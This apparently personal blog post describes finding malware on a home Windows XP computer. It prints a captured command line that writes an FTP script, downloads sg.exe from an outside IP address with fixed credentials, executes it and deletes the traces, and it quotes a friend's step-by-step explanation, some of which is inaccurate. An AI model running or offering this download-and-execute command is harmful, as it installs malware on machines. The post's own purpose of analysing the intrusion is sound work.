Infiltration in Windows!

by

We have a desktop (with Windows XP installed) which my mother uses for her daily work. Needless to say, she doesn’t know much beyond checking email. So, whenever she has a problem or the comp messes up, I have to do the dirty work.

Recently, my mom thought that the comp had suddenly slowed up and asked me to take a look. The comp was definitely infiltrated. Not only was it unusually slow, no new temporary file could be created. This is pretty serious, because common things like creating a zip file and burning CDs won’t work. First thing I did was run chkdsk. I found that one of the files inside TEMP was cross-linked to allocation block 20, at which point the chkdsk would hang.

I was randomly messing with the command line, in hope that something would work, when this script suddenly popped up.

59.95.209.158 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit

Interesting!
I don’t think the user is supposed to see this, but something I did (wish I knew!) made this show up. Now, this was definitely an intrusion of some sort. I don’t know much about this stuff, so I fired this off to my good friend Jitesh Shah.Here is his reply (verbatim):

this script is connecting to a server and downloading sg.exe
and the ftp options mean the foll :
-n = suppress auto-login
-v = suppress display of server responses
-s:filename = specify an ftp file. commands in this file are executed serially.. as in a shell script

each command in a shell script is prefixed by “&”…
eg. &dir , &cls … etc

“net start” starts all the services…

here’s a little summary i managed :
(with a little change in ur copy pasted log… it should have been prefixed by the command “open”, as far as i know…
here’s what happens :
open 59.95.209.158 43642 >> ij
“ij” is a normal file. Output redirection is used.
i.e. “open 59.95.209.158 43642” is written to a file “ij”

&echo user t g >> ij
next line in file is “user t g”.. i.e. login to your computer using username “t” and password “g” (which means.. that there a backdoor already installed).

&echo get sg.exe >> ij
get the file “sg.exe” from the server. (probably a virus)

&echo bye >> ij
“bye” command quits ftp

&ftp -n -v -s:ij
execute ftp command in shell… and input file is ij … which now looks something like this

ij contents :
open 59.95.209.158 43642
user t g
get sg.exe
bye

&del ij
remove the file “ij”…. cover the traces

&sg.exe
execute the downloaded virus file in shell

&net start SharedAccess
start all services.. which are, by now, infected

&exit
quit shell.. work done !!
comp infected !!

Kewl!
So now, I’m going to Google this stuff a bit, and see if I can get the hang of this stuff. I’ll also be seeing if I can do some reverse engineering on sg.exe. What exactly does this exe do anyway? Is it a service in windows? I also wanna check if this script left some logs, and if I can get the attack IP. Nice! *Rubbing hands in delight!*

UPDATE:
Surprise!
couldn’t find any sg.exe on the desktop. maybe I interrupted the script? Dunno… here’s a screenshot though, check out the temp folder!

Advertisements

Tags: ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: